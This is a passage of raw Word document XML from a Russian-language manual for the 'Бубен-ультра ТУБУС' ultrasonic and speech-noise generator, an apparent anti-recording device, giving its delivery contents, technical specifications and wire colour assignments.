                <wp:extent cx="2613660" cy="1836420"/>
                <wp:effectExtent l="3810" t="2540" r="1905" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1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83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DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                            <w:pPr>
                              <w:pStyle w:val="a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18.3pt;margin-top:31.4pt;width:205.8pt;height:144.6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Qc7tAIAALU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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
                      <w:pPr>
                        <w:pStyle w:val="ad"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>речеподобной помехи с периодической перестройкой во времени, для затруднения ее выделения из полезного сигнала КОМПЛЕКТ ПОСТАВКИ.</w:t>
      </w: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tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1139" w:tblpY="-26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firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="998"/>
        <w:gridCol w:w="4536"/>
        <w:gridCol w:w="3260"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00D658FC" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="203"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Изделие «Бубен-ультра ТУБУС»,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6"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Источник питания 12В, 3А ,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7"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Провод сетевой EU,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414"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Проводной пульт дистанционного управления (далее ППДУ),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413"/>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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37" w:right="1044"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Провод 8-ми жильный, для пульта ППДУ, м</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00D658FC" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="414"/>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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Беспроводной пульт дистанционного управления (далее БПДУ),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6"/>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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Батарея для БПДУ (тип 27А, 12В),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7"/>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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Коммутационная коробка,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7"/>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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Переходник для адаптера,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6"/>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sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Упаковка, комп.</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3"/>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sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4536" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="37"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Инструкция по эксплуатации,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bl>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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9620" w:type="dxa"/>
        <w:tblInd w:w="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4427"/>
        <w:gridCol w:w="799"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="851"/>
        <w:gridCol w:w="850"/>
        <w:gridCol w:w="851"/>
        <w:gridCol w:w="992"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2668F" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="727"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4427"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Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="799"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ТУБУС Н 12/55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850"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ТУБУС Н 24/55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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ТУБУС Н 24/110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850"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ТУБУС У 12/55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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ТУБУС У 24/55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992"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ТУБУС У 24/110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2668F" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="314"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4427"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Количество ультразвуковых излучателей, шт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="799"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850"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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992"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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2668F"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123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Угол излучения УЗП, по уровню -6ДБ, град</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="799"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55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850"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55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850"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55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992"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110</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Тип крепления и установки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Настольное</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Универсальное</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123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Количество независимых генераторов УЗП, шт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="123"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:w w:val="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6</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Диапазон излучения УЗП, КГц</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:gridSpan w:val="6"/>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24 — 26</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Диапазон излучения ЗП, Гц</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:gridSpan w:val="6"/>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10 — 2000</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Диапазон частот РП, Гц</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:gridSpan w:val="6"/>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300 — 10000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4427" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
            </w:tcBorders>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Тип излучаемой помехи</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
            </w:tcBorders>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сложная, изменяемая во времени</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Мощность усилителя РП, Вт</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w w:val="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2</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Анализ вторичного питания УЗП</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Есть</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="314"/>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Анализ работы УЗП</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По каждому каналу</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="312"/>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Частота приемника/передатчика РПДУ</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433 МГц</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Тип модуляции РПДУ</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АМн (ASK)</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Тип микросхемы РПДУ</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PT2264, PT2260, PT2262</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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Дальность действия РПДУ, не более</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3м</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Напряжение питания, В</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10 — 13</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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Ток потребления, не более, А</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1,5</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Возможность автономной работы</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Опционально</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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Диапазон рабочей температуры, град. С</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+5 - +40</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Относительная влажность, не более</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85,00%</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lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Габаритные размеры,не более, мм</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273 х 112</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Вес, не более, г</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2000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ВНЕШНИЙ ВИД. ОРГАНЫ УПРАВЛЕНИЯ И ИНДИКАЦИИ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251692544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3103880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1163955" cy="2051050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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63955"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Pr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="3959" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Основной блок ТУБУС — Н, ТУБУС — У. Назначение проводов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5188"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Черный</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t>— общий (минус источника</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>питания)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5188"/>
        </w:tabs>
        <w:ind w:left="0" w:right="2028" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Розовый</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вход </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>кнопки включение/отключение прибора Белый</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">выход </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>на индикатор</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MODE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5188"/>
        </w:tabs>
        <w:ind w:left="0" w:right="2583" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
